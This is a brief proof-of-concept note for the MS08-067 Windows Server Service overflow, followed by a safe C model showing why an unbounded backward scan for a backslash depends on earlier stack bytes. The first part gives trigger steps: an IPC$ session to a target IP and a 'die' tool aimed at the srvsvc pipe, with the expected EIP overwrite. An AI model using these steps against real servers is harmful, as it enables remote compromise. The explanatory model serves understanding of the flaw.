MS Windows Server Service Code Execution PoC (MS08-067)
In vstudio command prompt:
attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/...)
net use \\IPADDRESS\IPC$ /user:user creds
die \\IPADDRESS \pipe\srvsvc
In some cases, /user:"" "", will suffice (i.e., anonymous connection)
You should get EIP -> 00 78 00 78, a stack overflow (like a guard page
violation), access violation, etc. However, in some cases, you will get
This is because it depends on the state of the stack prior to the "overflow".
You need a slash on the stack prior to the input buffer.
So play around a bit, you'll get it working reliably...
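
The dependence on earlier stack contents noted above can be modelled safely in user space. This is an added example, not part of the original PoC and not Windows code: it assumes the affected routine scans backward for a `\` separator, and compares a scan with no lower bound against a bounded one. The arena, the function names and the sample bytes are constructed for illustration.

```c
#include <stddef.h>
#include <string.h>

#define SCAN_MISS (-1000000L)  /* no separator inside the modelled memory */
#define BUF_OFF   16           /* input buffer starts 16 bytes into the arena */

/* Unbounded: walks down from buf[from] with no check against the buffer
 * start, so bytes that precede the buffer decide the result. Returns the
 * offset relative to the buffer start; negative means outside the buffer. */
long scan_back_unbounded(const char *arena, size_t from)
{
    size_t i = BUF_OFF + from;
    for (;;) {
        if (arena[i] == '\\') return (long)i - BUF_OFF;
        if (i == 0) return SCAN_MISS;  /* model edge; says nothing about real memory */
        i--;
    }
}

/* Bounded: never reads below the buffer start. */
long scan_back_bounded(const char *arena, size_t from)
{
    const char *buf = arena + BUF_OFF;
    size_t i = from;
    for (;;) {
        if (buf[i] == '\\') return (long)i;
        if (i == 0) return SCAN_MISS;
        i--;
    }
}

/* Builds the arena from constructed "prior" bytes (at most BUF_OFF are used)
 * and a non-empty input (at most 47 chars), then scans from the input's
 * last byte. */
long demo(const char *prior, const char *input, int bounded)
{
    char arena[64];
    size_t plen = strlen(prior), ilen = strlen(input);
    if (ilen == 0 || ilen > 47) return SCAN_MISS;
    if (plen > BUF_OFF) plen = BUF_OFF;
    memset(arena, 'A', sizeof arena);
    memcpy(arena, prior, plen);
    memcpy(arena + BUF_OFF, input, ilen + 1);
    return bounded ? scan_back_bounded(arena, ilen - 1)
                   : scan_back_unbounded(arena, ilen - 1);
}
```

With the same input, the unbounded scan returns a different result depending only on the bytes placed before the buffer, while the bounded scan does not.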